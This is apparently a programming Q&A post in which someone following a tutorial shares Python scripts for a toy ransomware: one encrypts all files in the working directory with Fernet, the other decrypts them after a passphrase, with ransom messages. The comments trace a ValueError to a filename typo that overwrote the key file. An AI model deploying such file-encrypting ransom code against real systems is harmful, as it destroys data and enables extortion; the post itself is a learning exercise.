# Encryption/Decryption python ValueError

Tags: python, python-3.x, encryption

I'm following a YouTube coding tutorial, it teaches you how to write a simple python code to encrypt files in a given directory:

```
#!/usr/bin/env python3
import os
from cryptography.fernet import Fernet
# let's find the files

files = []

for file in os.listdir():
# let's make sure that the code doesn't encrypt itself or the key that it generates
    if file == "voldemort.py" or file == "theykey.key" or file == "decrypt.py":
        continue
    if os.path.isfile(file):
        files.append(file)

print(files)

key = Fernet.generate_key()

with open("thekey.key", "wb" ) as thekey:
    thekey.write(key)

for file in files:
    with open(file, "rb") as thefile:
# open every file in binary mode and read it in binary mode aka 'rb'
        contents = thefile.read()
# let's encrypt the files
    contents_encrypted = Fernet(key).encrypt(contents)
    with open(file, "wb") as thefile:
        thefile.write(contents_encrypted)
```

and then decrypt those files using a password:

```
    #!/usr/bin/env python3
import os
from cryptography.fernet import Fernet
# let's find the files

files = []

for file in os.listdir():
    if file == "voldemort.py" or file == "theykey.key" or file == "decrypt.py":
        continue
    if os.path.isfile(file):
        files.append(file)

print(files)

with open("thekey.key", "rb") as key:
    secretkey = key.read()

secretphrase = "coffee"

user_phrase = input("Enter the secret phrase to decrypt your files\n")

if user_phrase == secretphrase:
    for file in files:
        with open(file, "rb") as thefile:
            contents = thefile.read()
        contents_decrypted = Fernet(secretkey).decrypt(contents)
        with open(file, "wb") as thefile:
            thefile.write(contents_decrypted)
        print("congrats, you're files are decrypted, enjoy your porn")
else:
    print("Sorry. Wrong secret phrase. Send me more bitcoin.")

print("All of your files have been encrypted, pay the ransome or you will loose them for eva.")
```

So the encryption part of the code seems to work as intended with the files coming out encrypted like so:

```
> [jk@fedora ransomware]$ cat file.txt
> gAAAAABikLSXKfLLbrcZfMSERarato7lLcp3ZxfpjeiiHIiwgcwR3ouIkF8a30XV9fatLjL_Kwtc3aEC76iqnxqxoV0okcfpmKSIUE23iyxzBqe5xKU3ZSo=
```

But the decryption part only worked once, where in it sucessfuly decrypted the files after the correct password was given

```
> [jk@fedora ransomware]$ python3 decrypt.py
['file.txt', 'file2.txt', 'hey.txt', 'pleasedonthurtme.txt', 'thekey.key']
Enter the secret phrase to decrypt your files
coffee
congrats, you're files are decrypted, enjoy your porn
congrats, you're files are decrypted, enjoy your porn
congrats, you're files are decrypted, enjoy your porn
congrats, you're files are decrypted, enjoy your porn
```

and then it kept spiting out a ValueError.

```
File "/home/jedrzejkiecol/ransomware/decrypt.py", line 27, in <module>
contents_decrypted = Fernet(secretkey).decrypt(contents)
  File "/usr/lib64/python3.10/site-packages/cryptography/fernet.py", line 34, in __init__
    raise ValueError(
ValueError: Fernet key must be 32 url-safe base64-encoded bytes.
```

Can anyone help me, the code worked fine for the YouTuber (NetworkChuck btw). I

Comment: if code on YouTube works then compare your code with code on Youtube because you may have mistake. I can only suggest to use `print()` to see which part of code is executed and what you have in variables. It is called `"print debuging"` and it helps to see what is the problem.

Comment: maybe check what you have in file `thekey.key`. Maybe you encrypted this file and now you have wrong `key` in this file. You should keep this file in safe place.

Comment: Yeah, obviously you don't want to encrypt / decrypt the key... Probably now an empty file after decryption failed.

Comment: None of the Encrypt/Decrypt/Key files were encrypted, as far as I can tell. This code is in both files to make sure that the code doesn't encrypt itself or the key.

for file in os.listdir():
    if file == "voldemort.py" or file == "theykey.key" or file == "decrypt.py":
        continue
    if os.path.isfile(file):
        files.append(file)

Comment: In `decrypt.py` one of the file checks you specify is `file == "theykey.key"` (note that `theykey.key` is not the same as `thekey.key`). Then, as you see in your output, `thekey.key` is included in the list of files to decrypt. Therefore, it ends up overwriting that files content, which is why you no longer have a valid key in that file.